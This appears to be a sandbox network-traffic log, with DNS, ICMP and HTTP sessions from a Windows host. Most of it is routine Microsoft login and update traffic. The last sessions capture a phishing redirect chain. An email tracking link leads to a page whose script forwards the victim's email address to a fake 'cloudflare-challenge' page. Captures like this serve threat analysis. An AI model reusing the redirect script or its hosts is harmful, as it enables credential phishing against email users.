Nov 18, 2024 17:56:10.140573978 CET	49578	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:11.128128052 CET	53	51703	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:11.160722971 CET	53	49578	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:13.546936035 CET	62946	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:13.547091007 CET	50864	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:13.561923027 CET	53	50864	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:13.563096046 CET	53	62946	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:15.611634970 CET	64384	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:15.611771107 CET	59632	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:15.618797064 CET	53	64384	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:15.618844032 CET	53	59632	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:17.125091076 CET	53	49634	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:20.047029972 CET	64493	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:20.047171116 CET	62179	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:20.059432983 CET	53	64493	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:20.082411051 CET	53	62179	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:21.051997900 CET	54155	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:21.052252054 CET	62340	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:21.059240103 CET	53	54155	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:21.059308052 CET	53	62340	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:22.108217955 CET	53	57372	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:22.335660934 CET	62485	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:22.335835934 CET	62051	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:22.343108892 CET	53	62485	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:22.343139887 CET	53	62051	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:35.112464905 CET	138	138	192.168.2.17	192.168.2.255
Nov 18, 2024 17:56:39.355990887 CET	53	61970	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:40.048573017 CET	49312	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:40.048834085 CET	63571	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:40.064033985 CET	53	49312	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:40.064138889 CET	53	63571	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:40.149764061 CET	53	54459	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:46.924074888 CET	56409	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:46.924227953 CET	64497	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:46.939174891 CET	53	56409	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:46.960478067 CET	53	64497	1.1.1.1	192.168.2.17
Nov 18, 2024 17:57:08.503421068 CET	53	56057	1.1.1.1	192.168.2.17
Nov 18, 2024 17:57:15.624936104 CET	61186	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:57:15.625165939 CET	57211	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:57:15.631901026 CET	53	57211	1.1.1.1	192.168.2.17
Nov 18, 2024 17:57:15.632363081 CET	53	61186	1.1.1.1	192.168.2.17
Nov 18, 2024 17:57:23.930763006 CET	62673	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:57:23.931155920 CET	54419	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:57:25.093982935 CET	53300	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:57:26.754738092 CET	62488	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:57:26.754853010 CET	54267	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:57:27.017620087 CET	53599	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:57:27.017738104 CET	50151	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:57:28.621217012 CET	52611	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:57:28.621324062 CET	61576	53	192.168.2.17	1.1.1.1

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 18, 2024 17:56:07.097079039 CET	192.168.2.17	1.1.1.1	c22b	(Port unreachable)	Destination Unreachable
Nov 18, 2024 17:56:20.082556009 CET	192.168.2.17	1.1.1.1	c296	(Port unreachable)	Destination Unreachable
Nov 18, 2024 17:56:46.960556984 CET	192.168.2.17	1.1.1.1	c296	(Port unreachable)	Destination Unreachable
Nov 18, 2024 17:57:25.252285957 CET	192.168.2.17	1.1.1.1	c2cd	(Port unreachable)	Destination Unreachable
Nov 18, 2024 17:57:27.169583082 CET	192.168.2.17	1.1.1.1	c2cd	(Port unreachable)	Destination Unreachable
Nov 18, 2024 17:57:28.367212057 CET	192.168.2.17	1.1.1.1	c29b	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:27 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-18 16:55:27 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-18 16:55:27 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 18 Nov 2024 16:54:27 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C529_BL2 x-ms-request-id: 4ee4682a-6c5a-45a2-a2ff-c010e634de92 PPServer: PPV: 30 H: BL02EPF0001D89C V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 18 Nov 2024 16:55:27 GMT Connection: close Content-Length: 11392
2024-11-18 16:55:27 UTC	11392	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:29 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-18 16:55:29 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-18 16:55:29 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 18 Nov 2024 16:54:29 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C529_BL2 x-ms-request-id: a3ad2dfa-2cbd-4c86-aee9-31b4976f4165 PPServer: PPV: 30 H: BL02EPF000270D0 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 18 Nov 2024 16:55:29 GMT Connection: close Content-Length: 11392
2024-11-18 16:55:29 UTC	11392	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:30 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePsK7ZCVA7dfvLb&MD=7twsYf23 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-18 16:55:30 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 267f9dd6-bc2b-4c1e-a521-3be245c58fef MS-RequestId: ccadf40f-d75e-4079-8055-2162b060da45 MS-CV: QSnSwXAcv0CokKZ2.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 18 Nov 2024 16:55:30 GMT Connection: close Content-Length: 24490
2024-11-18 16:55:30 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-18 16:55:30 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:32 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4742 Host: login.live.com
2024-11-18 16:55:32 UTC	4742	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-18 16:55:32 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 18 Nov 2024 16:54:32 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C529_BL2 x-ms-request-id: c8bb66ba-22e0-47f8-a69c-4a94fcf6aa67 PPServer: PPV: 30 H: BL02EPF0001D880 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 18 Nov 2024 16:55:32 GMT Connection: close Content-Length: 10197
2024-11-18 16:55:32 UTC	10197	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:40 UTC	864	OUT	GET /?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect HTTP/1.1 Host: r.neurotags.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:40 UTC	313	IN	HTTP/1.1 302 Found Date: Mon, 18 Nov 2024 16:55:40 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: B=5299271a.62732c961e0a9; path=/; max-age=630720000; domain=.neurotags.com Location: https://sepedatua.com/158983/secure-redirect Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8
2024-11-18 16:55:40 UTC	1	IN	Data Raw: 0a Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:42 UTC	678	OUT	GET /158983/secure-redirect HTTP/1.1 Host: sepedatua.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:42 UTC	393	IN	HTTP/1.1 301 Moved Permanently Connection: close Content-Type: text/html Content-Length: 706 Date: Mon, 18 Nov 2024 16:55:42 GMT Server: LiteSpeed Location: https://sepedatua.com/158983/secure-redirect/ Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000
2024-11-18 16:55:42 UTC	706	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helve

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:43 UTC	679	OUT	GET /158983/secure-redirect/ HTTP/1.1 Host: sepedatua.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:44 UTC	389	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Last-Modified: Mon, 18 Nov 2024 10:56:44 GMT Accept-Ranges: bytes Content-Length: 248 Date: Mon, 18 Nov 2024 16:55:44 GMT Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000
2024-11-18 16:55:44 UTC	248	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6d 79 6c 69 6e 6b 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 69 6d 65 73 6f 66 76 61 72 74 68 61 2e 63 6f 6d 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 2f 23 27 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 72 61 67 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 20 27 40 27 29 3b 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 6d 79 6c 69 6e 6b 20 2b 20 66 72 61 67 6d 65 6e 74 3b 0a 20 20 20 20 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a Data Ascii: <script> (function() { var mylink = 'https://timesofvartha.com/cloudflare-challenge/#'; var fragment = window.location.hash.substring(1).replace(/\+/g, '@'); window.location.href = mylink + fragment; })();</script>

Timestamp	Bytes transferred	Direction	Data
